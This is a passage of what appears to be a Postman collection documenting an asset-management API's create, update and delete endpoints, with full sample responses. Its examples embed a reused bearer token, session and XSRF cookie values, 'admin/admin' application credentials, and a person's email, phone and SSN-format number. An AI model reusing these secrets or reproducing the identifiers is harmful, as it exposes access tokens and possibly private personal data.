\"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0frm3x7y97tnwkmq35vun0c2f2996.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1805c486-ee27-4e35-a290-3f7cfd10ca14","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"type\":\"PROCESS\",\"severity\":3,\"asset_id\":\"5d07c408c569d501433591ce\",\"process_name\":\"S-SDLC\",\"process_description\":\"S-SDLC\"}"},{"id":"fbba7ef1-c9c2-4bfe-90a0-b2b3f61b7904","name":"Create a new PERSON","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PERSON\",\n\t\"person_email\": \"christine.mitchell@mycompany.com\",\n\t\"person_name\": \"Christine\",\n\t\"person_surname\": \"Mitchell\",\n\t\"person_city\": \"Salinas\",\n\t\"person_country\": \"USA\",\n\t\"person_phone\": \"831-996-1186\",\n\t\"person_doc\": \"133-86-4451\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:45:21 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0ql9j1sg4ap9o1lipqeyo3y60o2780.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01v3kqwbq7omhxzj41s7o0gx722955.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=301f9bc7-682f-41d6-847f-6683ec4d814d;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01v3kqwbq7omhxzj41s7o0gx722955.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"301f9bc7-682f-41d6-847f-6683ec4d814d","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"type\":\"PERSON\",\"severity\":0,\"asset_id\":\"5d07c3a1c569d501433591b7\",\"person_email\":\"christine.mitchell@mycompany.com\",\"person_name\":\"Christine\",\"person_surname\":\"Mitchell\",\"person_city\":\"Salinas\",\"person_country\":\"USA\",\"person_phone\":\"831-996-1186\",\"person_doc\":\"133-86-4451\"}"},{"id":"004ed85b-2a73-4398-bad5-d93c1028fffc","name":"Create a new HOST","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"HOST\",\n\t\"severity\": 4,\n\t\"host_ip\": \"192.168.54.40\",\n\t\"host_os\": \"Linux Mint 18.1\",\n\t\"hostname\": \"dmz80.servicos-dmz\",\n\t\"host_netbios\": \"DMZ80\",\n\t\"tags\": [\"a\", \"b\"]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:31:28 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node015y7ff5ef1kaw1xntg8tuheggm2715.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0z75m0iid01ie1j3vggchon3lp2747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=8cf025fc-7eb6-478b-807a-19cc3dd7636a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0z75m0iid01ie1j3vggchon3lp2747.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"8cf025fc-7eb6-478b-807a-19cc3dd7636a","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"hostname\": \"dmz80.servicos-dmz\",\n    \"type\": \"HOST\",\n    \"severity\": 4,\n    \"asset_id\": \"5d07c060c569d5014335918b\",\n    \"host_ip\": \"192.168.54.40\",\n    \"host_os\": \"Linux Mint 18.1\",\n    \"host_netbios\": \"DMZ80\",\n    \"tags\": [\n        \"a\",\n        \"b\"\n    ]\n}"},{"id":"a5825b7d-8011-4456-aa45-e277329a30d7","name":"Create a new CLOUD","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"CLOUD\",\n\t\"cloud_instance_id\": \"i-03fb10691d6a57263\",\n\t\"cloud_name\": \"Ubuntu Web Server\",\n\t\"severity\": 4\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:52:44 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0frm3x7y97tnwkmq35vun0c2f2996.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01ej2uxty84f80uxajjmxw1u4q3034.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=20882e71-087d-4f31-848e-162480f55e8e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01ej2uxty84f80uxajjmxw1u4q3034.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"20882e71-087d-4f31-848e-162480f55e8e","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"type\":\"CLOUD\",\"severity\":4,\"asset_id\":\"5d07c55cc569d501433591e3\",\"cloud_instance_id\":\"i-03fb10691d6a57263\",\"cloud_name\":\"Ubuntu Web Server\"}"}],"_postman_id":"b33373ae-aa8b-42fe-acdd-2e4d1e3efd4d"},{"name":"Update an Asset","id":"19811645-cb44-4186-9b63-1e2fcf1dc6f3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"severity","value":"Int","description":"<p>Integer from 0 to 4. If not set, it defaults to 0.</p>\n","type":"text"},{"key":"tag","value":"List<String>","description":"<p>List of Tags.</p>\n","type":"text"},{"key":"host_ip","value":"String","description":"<p>The Host IP Address.</p>\n","type":"text"},{"key":"hostname","value":"String","description":"<p>The Host Hostname.</p>\n","type":"text"},{"key":"host_os","value":"String","description":"<p>The Host Operating System.</p>\n","type":"text"},{"key":"host_netbios","value":"String","description":"<p>The Host Netbios.</p>\n","type":"text"},{"key":"app_url","value":"String","description":"<p>The WebApp URL.</p>\n","type":"text"},{"key":"app_credentials","value":"String","description":"<p>The Web App Credentials.</p>\n","type":"text"},{"key":"app_description","value":"String","description":"<p>The Web App Description.</p>\n","type":"text"},{"key":"app_port","value":"Int","description":"<p>The WebApp Port number.</p>\n","type":"text"},{"key":"person_email","value":"String","description":"<p>The Person Email Address.</p>\n","type":"text"},{"key":"person_name","value":"String","description":"<p>The Person First Name.</p>\n","type":"text"},{"key":"person_surname","value":"String","description":"<p>The Person Surname.</p>\n","type":"text"},{"key":"person_city","value":"String","description":"<p>The Person City.</p>\n","type":"text"},{"key":"person_country","value":"String","description":"<p>The Person Country.</p>\n","type":"text"},{"key":"person_phone","value":"String","description":"<p>The Person Phone Number.</p>\n","type":"text"},{"key":"person_doc","value":"String","description":"<p>The Person Document Number.</p>\n","type":"text"},{"key":"process_name","value":"String","description":"<p>The Process Name.</p>\n","type":"text"},{"key":"process_description","value":"String","description":"<p>The Process Description.</p>\n","type":"text"},{"key":"cloud_provider","value":"String","description":"<p>The Cloud Provider: \"AWS\", \"Google\" or \"Azure\".</p>\n","type":"text"},{"key":"cloud_name","value":"String","description":"<p>The Cloud Name.</p>\n","type":"text"},{"key":"cloud_instance_type","value":"String","description":"<p>The Instance Type. Example: \"EC2\".</p>\n","type":"text"},{"key":"cloud_region","value":"String","description":"<p>The Cloud Region. Example: \"us-west-2\".</p>\n","type":"text"},{"key":"cloud_security_groups","value":"List<String>","description":"<p>The IDs of the Security Groups.</p>\n","type":"text"},{"key":"cloud_instance_id","value":"String","description":"<p>The Cloud Instance ID.</p>\n","type":"text"},{"key":"cloud_image_id","value":"String","description":"<p>The Image ID.</p>\n","type":"text"},{"key":"cloud_internal_ip_addresses","value":"List<String>","description":"<p>List of IP Addresses.</p>\n","type":"text"},{"key":"cloud_public_ip_address","value":"String","description":"<p>IP Address.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/assets/<asset_id>","description":"<p>This endpoint allows you to update and existing Asset. The fields depend on the Asset TYPE. Trying to add a field from another Asset Type will have no effect. Trying to change the Asset Type will have no effect neither.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"3c386811-178c-4031-9fac-af19d8b71091","id":"3c386811-178c-4031-9fac-af19d8b71091","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","assets","<asset_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"11fe5f72-309f-4003-b861-48a160f2b51e","name":"Update an Asset","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"hostname\": \"dmz112.servicos-dmz\",\n\t\"netbios\": \"DMZ112\",\n\t\"severity\": \"3\"\n}"},"url":"https://subdomain.gat.digital/api/v1/assets/5ab9178ee12f5e05704b903c"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:13:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node014q7bmqg8s7y414w3wen3ulbvo3347.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0zaojsk1qu7w6auitvnhqjuqj3510.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=58cb9df5-79a0-4f81-8704-9eb33d0a0d2f;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0zaojsk1qu7w6auitvnhqjuqj3510.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"58cb9df5-79a0-4f81-8704-9eb33d0a0d2f","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"hostname\":\"dmz112.servicos-dmz\",\"score\":0,\"type\":\"HOST\",\"severity\":3,\"asset_id\":\"5ab9178ee12f5e05704b903c\",\"asset_group\":[\"5ab91862e12f5e056e329781\"],\"host_ip\":\"192.168.1.12\",\"host_os\":\"\\nMicrosoft Windows 10 Enterprise Insider Preview\",\"host_netbios\":\"DMZ112\"}"},{"id":"de446b06-cdc2-4bbf-b22c-84955a65e00b","name":"Conflict on Update","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"app_url\": \"https://www.google.com\"\n}"},"url":"https://subdomain.gat.digital/api/v1/assets/5cd309a0c569d571d3afcd7f"},"status":"Conflict","code":409,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:14:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0zaojsk1qu7w6auitvnhqjuqj3510.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01dqhkkeiri7m714infihn2liqv3537.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=e11d46a8-b896-430e-96f3-e972e8abc2d7;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01dqhkkeiri7m714infihn2liqv3537.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"e11d46a8-b896-430e-96f3-e972e8abc2d7","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"ALREADY EXISTS IN DATABASE\"}"},{"id":"2bb33893-dd9b-48d2-9301-88b234dab54e","name":"Try to change the Asset Type","originalRequest":{"method":"PATCH","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PERSON\"\n}"},"url":"https://homolog.gat.digital/api/v1/assets/5cd309a0c569d571d3afcd7f"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:15:11 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0va4ocs50t5zm1ivyqu9v2a5im3553.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0zi654ji1b4izijj7v5zm469i3563.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=caa941ce-7810-4caf-86f6-bf2d796d522f;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0zi654ji1b4izijj7v5zm469i3563.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"caa941ce-7810-4caf-86f6-bf2d796d522f","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"hostname\":\"google.com\",\"score\":0,\"type\":\"APPLICATION\",\"severity\":0,\"port\":80,\"asset_id\":\"5cd309a0c569d571d3afcd7f\",\"app_url\":\"http://teste.com.br\",\"app_credentials\":\"admin/admin\",\"app_description\":\"Web app description\"}"}],"_postman_id":"19811645-cb44-4186-9b63-1e2fcf1dc6f3"},{"name":"Delete an Asset","id":"cc179932-8cb3-4924-9365-13a3eaedb5bb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"id","value":"List<String>","description":"<p>The list of Asset IDs you want to delete.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/assets","description":"<p>This endpoint allows you to delete one or more Assets.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"3c386811-178c-4031-9fac-af19d8b71091","id":"3c386811-178c-4031-9fac-af19d8b71091","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v1","assets"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"6a420c50-6a2e-40e8-a6d4-83e717973b3e","name":"Some Assets were not Found","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"id\": [\"5ca4fc4ec569d523f821c7ad\", \"5ab9178ee12f5e0570000000\"]\n}"},"url":"https://subdomain.gat.digital/api/v1/assets"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 17:23:57 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0p0bva1hpn3nn13bxa6k8cg5da3720.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0b06qx2dym2hx1cczjp3xwmvhx3763.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=900a6f76-d52f-4fe4-8711-f03d04285006;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin 